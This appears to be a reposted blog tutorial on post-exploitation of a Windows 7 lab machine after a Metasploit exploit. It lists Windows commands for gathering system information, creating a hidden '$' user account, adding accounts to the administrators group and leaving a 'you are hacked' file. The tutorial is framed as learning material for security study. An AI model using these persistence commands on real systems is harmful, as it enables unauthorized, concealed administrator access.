当前位置:网站首页>Network security engineer Demo: the original * * is to get your computer administrator rights! [maintain]
Network security engineer Demo: the original * * is to get your computer administrator rights! [maintain]
2020-11-06 01:35:00 【Kali and programming】
Before class statement :
1、 This sharing is only for learning exchange , Please abide by the laws and regulations consciously !
2、 Search for :Kali And programming , Learn more about the Internet *** dried food !
3、Kali And programming is updated on time every day , Please study and pay attention to !
Body part
One 、 Background introduction
Metasploit It's a vulnerability framework . Its full name is The Metasploit Framework, It's called MSF.Metasploit As the most popular tool in the world , Not just because it's convenient and powerful , What's more, its framework . It allows users to develop their own vulnerability scripts , To test .Metasploit(msf) How powerful it is ? How to use it *** Controlling the victim's mainframe ? Now let's learn !
Two 、 Resources and equipment
1. It's a success Win7 One virtual machine
2. Xiaobai, who is ready to go .
3. Installed Kali Linux One virtual machine .
3、 ... and 、 Strategic arrangements
3.1 Yes, it's taken down Windows After the host enters *** Stage , The specific operation is shown in the figure below .
step 1: Run the exploit module , As shown in the figure below .
command :run
step 2: Get into Windows The host cmd window , As shown in the figure below .
step 3: Use the command to view the system information of the victim host , Know yourself and know your enemy, and have a more comprehensive grasp of the target victim host , More comprehensive control of the target host , Get more comprehensive information , As shown in the figure below .
command :systeminfo
step 4: The system information of the victim host is shown in the figure below .
3.2 User management operation on the victim host , As shown in the figure below .
step 1: Add hidden user information to the victim host , As shown in the figure below .
command :net user A new user name $ User password /add
Example :net user admin$ 12456 /add
step 2: Check out the new users you just added , As shown in the figure below .
command :net user( Because the new user is a hidden user , So the command line can't see the user )
step 3: Add new users that are not hidden , As shown in the figure below .
command :net user A new user name User password /add
Example :net user admin 12456 /add
step 4: Check out the new users you just added , As shown in the figure below .
command :net user
step 5: Use the graphical interface in the victim host to view the newly created user , You can see the new hidden user in this interface ( If you need to achieve the real sense of hidden users, you need to change the registry , Please keep an eye on the follow-up of this issue )
step 6: Delete user , As shown in the figure below .
command :net user user name /del
Example :net user admin /del
step 7: Add the new user to the administrators group , As shown in the figure below .
command :net localgroup administrators /add
step 8: View the users of the administrators group , As shown in the figure below .
command :net localgroup administrators
3.3 File operation on the victim host , As shown in the figure below .
step 1: New folder
command :md file name
Example :md abc
step 2: Delete folder
command :rd file name
Example :rd abc
step 3: New text file , As shown in the figure below .
command :echo Text file content > file name
Example :echo hi you are hacked > hk.txt
3.4 Check the host name of the victim host , As shown in the figure below .
command :hostname
Small make up a word knock creation , It's hard work , Can you pay attention to me ? You can also search for :Kali And programming , Learn more ****** How about the technique ! Rejection of piracy , Please state the source of the reprint :Kali And programming
Point me to learn more Kali Linux*** Testing and networking *** Practical skills ! Please add a link description
版权声明
本文为[Kali and programming]所创,转载请带上原文链接,感谢
边栏推荐
- 01. SSH Remote terminal and websocket of go language
- Linked blocking Queue Analysis of blocking queue
- Jetcache buried some of the operation, you can't accept it
- Individual annual work summary and 2019 work plan (Internet)
- Who says cat can't do link tracking? Stand up for me
- Filecoin主网上线以来Filecoin矿机扇区密封到底是什么意思
- If PPT is drawn like this, can the defense of work report be passed?
- How to demote domain controllers and later in Windows Server 2012
- The dynamic thread pool in Kitty supports Nacos and Apollo multi configuration centers
- Pattern matching: The gestalt approach一种序列的文本相似度方法
猜你喜欢
Cglib 如何实现多重代理?
给字节的学姐讲如何准备“系统设计面试”
Elasticsearch数据库 | Elasticsearch-7.5.0应用搭建实战
仅用六种字符来完成Hello World,你能做到吗?
Jetcache buried some of the operation, you can't accept it
百万年薪,国内工作6年的前辈想和你分享这四点
[Xinge education] poor learning host computer series -- building step 7 Simulation Environment
Network security engineer Demo: the original * * is to get your computer administrator rights! 【***】
Recommendation system based on deep learning
Face to face Manual Chapter 16: explanation and implementation of fair lock of code peasant association lock and reentrantlock
随机推荐
Arrangement of basic knowledge points
Nodejs crawler captures ancient books and records, a total of 16000 pages, experience summary and project sharing
零基础打造一款属于自己的网页搜索引擎
Flink的DataSource三部曲之一:直接API
6.6.1 localeresolver internationalization parser (1) (in-depth analysis of SSM and project practice)
Analysis of ThreadLocal principle
零基础打造一款属于自己的网页搜索引擎
It's easy to operate. ThreadLocal can also be used as a cache
6.5 request to view name translator (in-depth analysis of SSM and project practice)
零基础打造一款属于自己的网页搜索引擎
Thoughts on interview of Ali CCO project team
比特币一度突破14000美元,即将面临美国大选考验
Analysis of react high order components
Jmeter——ForEach Controller&Loop Controller
前端工程师需要懂的前端面试题(c s s方面)总结(二)
用一个例子理解JS函数的底层处理机制
一篇文章带你了解HTML表格及其主要属性介绍
vue-codemirror基本用法:实现搜索功能、代码折叠功能、获取编辑器值及时验证
一篇文章带你了解SVG 渐变知识
After reading this article, I understand a lot of webpack scaffolding